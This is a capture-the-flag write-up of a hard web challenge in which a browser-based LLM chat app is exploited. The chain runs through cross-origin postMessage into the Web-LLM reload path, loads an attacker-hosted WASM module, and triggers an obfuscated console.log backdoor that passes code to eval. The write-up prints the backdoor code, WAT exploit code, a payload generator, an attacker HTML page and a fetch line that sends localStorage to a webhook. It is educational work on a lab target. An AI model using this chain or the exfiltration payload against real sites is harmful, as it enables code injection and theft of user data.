swiss hacking challenge 2024 - form-filler-2000
Difficulty: hard
Category: web
Author: sam.ninja
Alright, listen up, because I’m only going to go through this once, and frankly, I’ve had it up to here with everyone and their dog asking about ChatGPT. Yes, I know, “It’s for productivity,” “It’ll change my life,” yadda yadda. Look, it’s not happening, not on my watch. The last thing we need is to lose our ISO 27001 certification because everyone’s chatting away with an AI. It’s been a circus since day one, with everyone from Linda in accounting to Kevin from the social committee trying to sneak around our restrictions. Data security is no joke, folks. Enter Austin, the intern wunderkind, who’s somehow magicked up a local version of ChatGPT that runs in the browser. Claims it’s secure, uses all these fancy tech terms like WebGPU and WebAssembly. To me, it’s black magic, but he assures me it’s all above board. So, we’re giving it a go, installed it on the virtual environment. It’s like having Clippy back, but less annoying and hopefully not a data breach waiting to happen.
The CTO even greenlit some absurdly expensive RTX 4090 GPUs to run this thing smoothly. Because, apparently, throwing tech at the problem is the solution now. So, there you have it. Your beloved ChatGPT is back, sort of. Just keep it professional, alright? And please, for the love of sanity, no more begging emails about unblocking the original. My inbox is a warzone as it is. Catch you at the next tech meltdown.
Files
We get an instance and the following files:
form-filler-2000
├── Dockerfile
├── package.json
├── package-lock.json
├── patch.js
├── server.js
└── src
    ├── index.html
    ├── main.ts
    ├── style.css
    └── worker.ts
Exploitation
Part 1: The ninja backdoor
Looking at the files, there is a `patch.js`, which is added to the compiled code:
window['buffer']=[],window['originalLog']=console['log'],console['log']=_0x5aa5cc=>{window['originalLog'](_0x5aa5cc);if(_0x5aa5cc===0x0){const _0x488013=String['fromCodePoint'](...window['buffer']);window['buffer']=[];const _0x407abc='🥷backdoor🥷';_0x488013['startsWith'](_0x407abc)&&eval(_0x488013['slice'](_0x407abc['length']));}else typeof _0x5aa5cc==='number'&&_0x5aa5cc>=0x0&&_0x5aa5cc<=0x10ffff&&window['buffer']['push'](_0x5aa5cc);};
Deobfuscating that file leads to the following:
window['buffer'] = [] // Initialize a new buffer array on the window object
window['originalLog'] = console['log'] // Keep a copy of the original console.log function
// Define a new console.log function
console['log'] = _0x5aa5cc => {
    // Call the original console.log first
    window['originalLog'](_0x5aa5cc)
    // If the input is 0x0
    if (_0x5aa5cc === 0x0) {
        // Convert the buffer array into a Unicode string
        const _0x488013 = String['fromCodePoint'](...window['buffer'])
        // Clear the buffer
        window['buffer'] = []
        const _0x407abc = '🥷backdoor🥷'
        // If the buffer starts with the backdoor string above, pass everything after it to eval()
        _0x488013['startsWith'](_0x407abc) && eval(_0x488013['slice'](_0x407abc['length']));
    }
    // Else, append the input to the window.buffer array, if it is a valid code point
    else typeof _0x5aa5cc === 'number' && _0x5aa5cc >= 0x0 && _0x5aa5cc <= 0x10ffff && window['buffer']['push'](_0x5aa5cc);
};
This means we can get JS execution if we manage to call `console.log` in the expected way.
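To illustrate the mechanism, here is a minimal sketch of how the backdoor would be fed and triggered, assuming we already control values passed to `console.log` (the `alert` payload is just a placeholder):
// Stream the payload into the patched console.log one code point at a
// time; the trailing 0 flushes the buffer and eval()s everything after
// the marker.
const payload = '🥷backdoor🥷alert(document.domain)';
for (const ch of payload) {
  console.log(ch.codePointAt(0));
}
console.log(0);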
Part 2: The mysterious twice-working worker.js
When looking at the `Dockerfile`, there seem to be some suspicious things going on:
RUN cd dist && sed -i "s:</body>:<script type=\"module\" src=\"/$(ls worker.*.js)\"></script> </body>:" index.html
# Steve from IT: I don't really trust all that new fangled javascript stuff, so I'm going to add subresource integrity to all the resources
# Found some info about it here:
# https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity
# Our build system doesn't support it, but I found a posthtml plugin that does it
# https://github.com/parcel-bundler/parcel/issues/2003#issuecomment-1369515955
RUN npx posthtml -u posthtml-sri --posthtml-sri.basePath=dist/ dist/index.html
However, when looking at the `main.ts` file, the worker is also included there:
const chat = new webllm.ChatWorkerClient(new Worker(
  new URL('./worker.ts', import.meta.url),
  { type: 'module' }
));
Let’s have a look at the actual worker:
// Taken from https://github.com/mlc-ai/web-llm/blob/3319d1c5a93f57425b964c6b3b13e71dcd349d75/README.md#using-web-worker
import { ChatWorkerHandler, ChatModule } from "@mlc-ai/web-llm";
// Hookup a chat module to a worker handler
const chat = new ChatModule();
const handler = new ChatWorkerHandler(chat);
self.onmessage = (msg: MessageEvent) => {
  try {
    handler.onmessage(msg);
  } catch {
    // Might crash if there's no GPU
  }
};
It registers an `onmessage` handler on `self` and then passes incoming messages to the `ChatWorkerHandler`. But what happens if this script is included in the main HTML file instead of being registered as a web worker? In that case, `self` is `window`, so the handler has the same effect as listening for messages with `window.addEventListener("message")`.
OH WAIT
This means we can send `MessageEvent`s using `postMessage()` on an opened window object, even from a different origin!
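As a quick illustration (the URL is hypothetical), any page holding a reference to the challenge window can now deliver arbitrary messages to the chat handler:
// Minimal sketch from an attacker-controlled page: open the challenge
// window and deliver an arbitrary MessageEvent across origins.
const win = window.open('http://challenge-instance/');
// '*' as targetOrigin, since we don't care who reads the message
win.postMessage({ kind: 'hello' }, '*');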
Part 3: Getting the right message
But what messages can we send to actually log something to the console? A GitHub search for `console.log` in the Web-LLM repository reveals the following in `src/chat_module.ts`:
export class ChatModule implements ChatInterface {
  private currentModelId?: string = undefined; // Model current loaded, undefined if nothing is loaded
  private logger: (msg: string) => void = console.log;
  // ...

  async reload(modelId: string, chatOpts?: ChatOptions, appConfig?: AppConfig): Promise<void> {
    this.deviceLostIsError = false; // so that unload() does not trigger device.lost warning
    this.unload();
    this.logitProcessor = this.logitProcessorRegistry?.get(modelId);
    const tstart = performance.now();
    if (appConfig === undefined) {
      appConfig = prebuiltAppConfig;
    }
    const findModelRecord = () => {
      const matchedItem = appConfig?.model_list.find(
        item => item.model_id == modelId
      );
      if (matchedItem !== undefined) return matchedItem;
      throw Error("Cannot find model_url for " + modelId);
    }
    const modelRecord = findModelRecord();
    const baseUrl = typeof document !== "undefined" ? document.URL : globalThis.location.origin;
    let modelUrl = modelRecord.model_url;
    if (!modelUrl.startsWith("http")) {
      modelUrl = new URL(modelUrl, baseUrl).href;
    }
    const configCache = new tvmjs.ArtifactCache("webllm/config");

    // load config
    const configUrl = new URL("mlc-chat-config.json", modelUrl).href;
    this.config = {
      ...(await (await configCache.fetchWithCache(configUrl)).json()),
      ...chatOpts
    } as ChatConfig;

    // load tvm wasm
    const wasmCache = new tvmjs.ArtifactCache("webllm/wasm");
    const wasmUrl = modelRecord.model_lib_url;
    if (wasmUrl === undefined) {
      throw Error("You need to specify `model_lib_url` for each model in `model_list` " +
        "so that we can download the model library (i.e. wasm file).")
    }
    const fetchWasmSource = async () => {
      if (wasmUrl.includes("localhost")) {
        // do not cache wasm on local host as we might update code frequently
        return await fetch(wasmUrl);
      } else if (!wasmUrl.startsWith("http")) {
        // do not cache wasm on the same server as it can also refresh
        // rely on the normal caching strategy
        return await fetch(new URL(wasmUrl, baseUrl).href);
      } else {
        // use cache
        return await wasmCache.fetchWithCache(wasmUrl);
      }
    };
    const wasmSource = await (await fetchWasmSource()).arrayBuffer();
    const tvm = await tvmjs.instantiate(
      new Uint8Array(wasmSource),
      tvmjs.createPolyfillWASI(),
      this.logger
    );
    // ...
  }
}
The last code block is especially interesting. It passes the logger object and the WASM for the AI model to the tvmjs `instantiate` method. Looking at that, we can see that the logger function is made available to the WASM:
export function instantiate(
  bufferSource: ArrayBuffer,
  importObject: Record<string, any> = {},
  logger: (msg: string) => void = console.log
): Promise<Instance> {
  const env = new Environment(importObject, logger);

  return WebAssembly.instantiate(bufferSource, env.imports).then(
    (result: WebAssembly.WebAssemblyInstantiatedSource): Instance => {
      return new Instance(result.module, {}, result.instance, env);
    }
  );
}
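The exact wiring happens inside tvmjs's `Environment`. Judging by the import name used in the exploit below, the logger presumably ends up reachable from the module as `env.__console_log`; a rough sketch of the assumed mapping (not the actual tvmjs code):
// wasmBuffer: the fetched model_lib_url bytes
const imports = {
  env: {
    // the logger from ChatModule ends up here (assumed wiring)
    __console_log: (msg) => console.log(msg),
    // ... plus the WASI and TVM runtime imports
  },
};
const { instance } = await WebAssembly.instantiate(wasmBuffer, imports);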
Judging from the source code, we have to call the `reload` function using a message. I used the following snippet in the runner context to sniff all incoming messages:
this.addEventListener("message", (msg) => {console.log(msg.data)})
This reveals a sample reload message:
{
  "kind": "reload",
  "uuid": "8292ee07-37c1-4d6e-959c-fc8f40e6f813",
  "content": {
    "localIdOrUrl": "Llama-2-7b-chat-hf-q4f32_1"
  }
}
Now, we’ll have to load our own model like that.
Part 4: WAT
`WebAssembly.instantiate` expects an import object whose members can then be called from inside the WASM. This is exactly what happens with our `logger` object.
As the `instantiate` method doesn't call any function directly, we'll have to do some trickery. I used WAT (the WebAssembly text format) to write my exploit:
(module
  ;; Import the `__console_log` function, expecting an i32 integer.
  (import "env" "__console_log" (func $__console_log (param i32)))

  (func $printIntegers
    i32.const 1234
    call $__console_log
  )

  ;; Automatically call `$printIntegers` upon module instantiation.
  (start $printIntegers)
)
We can compile this using `wat2wasm exploit.wat -o exploit.wasm`.
After a bit of source code review, I found out how to load a model from an external URL:
{
  "kind": "reload",
  "uuid": "25a462b5-c95a-47f4-ab73-acc3df5f1357",
  "content": {
    "localIdOrUrl": "exploit",
    "appConfig": {
      "model_list": [
        {
          "model_url": "http://your-webhost/",
          "model_lib_url": "http://your-webhost/exploit.wasm",
          "local_id": "exploit"
        }
      ]
    }
  }
}
The library also expects an `mlc-chat-config.json` under the specified `model_url`. Creating an empty JSON file (`{}`) is enough.
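Any host that serves the two files with permissive CORS headers will do, since the challenge origin fetches them cross-origin. A minimal, hypothetical Node sketch:
// Dependency-free static host for the exploit assets (illustrative only).
const http = require('http');
const fs = require('fs');

http.createServer((req, res) => {
  res.setHeader('Access-Control-Allow-Origin', '*');
  if (req.url.endsWith('exploit.wasm')) {
    res.setHeader('Content-Type', 'application/wasm');
    res.end(fs.readFileSync('exploit.wasm'));
  } else {
    // everything else, including mlc-chat-config.json, gets the empty config
    res.setHeader('Content-Type', 'application/json');
    res.end('{}');
  }
}).listen(8080);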
After testing this using `window.postMessage(<json>, "*")` and successfully seeing `1234` printed to the console, we can move on to the actual exploit.
Part 5: Putting everything together
To generate the full WAT file for the backdoor string and my payload, I wrote a small JS script:
const readline = require('readline');

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
});

rl.question('Enter a string: ', (inputString) => {
  const codePoints = Array.from(inputString).map(char => char.codePointAt(0));
  console.log(codePoints);
  for (const cp of codePoints) {
    console.log(`i32.const ${cp}`);
    console.log(`call $__console_log`);
  }
  rl.close();
});
Note: to actually trigger the backdoor, there also needs to be a `console.log(0)` call in the WASM.
I used `fetch("https://webhook.site/695806ee-1a50-47c1-a29c-71c84a44bc7b?" + JSON.stringify(localStorage))` to get the whole local storage contents, where the bot stores the flag.
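Combining the generator, the module skeleton from Part 4, and the exfiltration payload, a hypothetical builder for the final WAT could look like this (the webhook URL and helper name are placeholders):
// Emit a complete WAT module: marker + JS payload as code points, then the
// terminating console.log(0) that triggers the backdoor's eval().
function buildWat(payload) {
  const body = Array.from(payload)
    .map(ch => `    i32.const ${ch.codePointAt(0)}\n    call $__console_log`)
    .join('\n');
  return `(module
  (import "env" "__console_log" (func $__console_log (param i32)))
  (func $run
${body}
    i32.const 0
    call $__console_log
  )
  (start $run)
)`;
}

const js = 'fetch("https://your-webhook/?" + JSON.stringify(localStorage))';
console.log(buildWat('🥷backdoor🥷' + js));
Piping the output through `wat2wasm` as before yields the final `exploit.wasm`.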
Finally, we need to build an HTML page that opens a new window on load and sends the message to the challenge instance:
<!doctype html>
<html>
  <head>
    <meta charset="UTF-8" />
    <title>CYBER CYBER CYBER!</title>
    <script>
      let win = window.open('http://localhost/');
      let msg = {
        "kind": "reload",
        "uuid": "25a462b5-c95a-47f4-ab73-acc3df5f1357",
        "content": {
          "localIdOrUrl": "exploit",
          "appConfig": {
            "model_list": [
              {
                "model_url": "http://your-webhost/",
                "model_lib_url": "http://your-webhost/exploit.wasm",
                "local_id": "exploit"
              }
            ]
          }
        }
      };
      // Wait for the challenge page to load before delivering the message
      setTimeout(function () {
        win.postMessage(msg, '*');
      }, 5000);
    </script>
  </head>
</html>
To get the flag, we can now call the bot, which should make the flag show up on our webhook:
$ curl https://<your-challenge-instance>.ctf.m0unt41n.ch:1337/visit -H "Content-Type: application/json" -d '{"url":"http://your-webhost/exploit.html"}'
Flag
Conclusion
Even though it took me ages to solve this challenge, it was my favorite one. Such a crazy exploit chain, and I learned a lot more about the web and WASM while solving it.